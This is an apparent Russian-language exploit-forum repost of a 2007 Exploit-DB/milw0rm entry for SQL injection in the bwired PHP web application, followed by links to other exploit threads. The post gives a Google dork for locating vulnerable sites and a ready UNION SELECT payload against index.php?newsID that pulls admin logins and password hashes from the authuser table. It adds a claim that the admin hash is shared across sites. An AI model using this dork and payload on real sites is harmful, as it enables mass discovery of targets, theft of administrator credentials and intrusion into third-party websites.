Exploit bwired - 'index.php?newsID' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4213
Проверка EDB
  1. Пройдено
Автор
G00NS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3978 cve-2007-3977 cve-2007-3976
Дата публикации
2007-07-22
Код: 
###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#bwired - Remote SQL Injection
#
#Note #######################################################################################
#There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
#The admin hash will be the same for all the sites I believe. Seeing all the sites are managed by the creator of the webapp.
#Script Website ##############################################################################
#http://web.bwired.com.au
#
#d0rk ######################################################################################
#"Powered by bwired" inurl:?newsID=
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtobwired]/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, fish, milf, ScUzZ, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#<S>, Bernard and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-07-22]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Microsoft Windows Kernel - 'ATMFD.DLL' Out-of-Bounds Read due to Malformed Name INDEX in the CFF Table
Ответы
0
Просмотры
677
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index
Ответы
0
Просмотры
744
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Google Android - 'IOMXNodeInstance::enableNativeBuffers' Unchecked Index
Ответы
0
Просмотры
697
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Apple Mac OSX Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver
Ответы
0
Просмотры
562
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversals
Ответы
0
Просмотры
528
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)
Ответы
0
Просмотры
496
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table
Ответы
0
Просмотры
479
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting
Ответы
0
Просмотры
468
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Index Server 2.0 - '%20' ASP Source Disclosure
Ответы
0
Просмотры
469
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fork CMS 3.x - '/private/en/locale/index?name' Cross-Site Scripting
Ответы
0
Просмотры
440
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу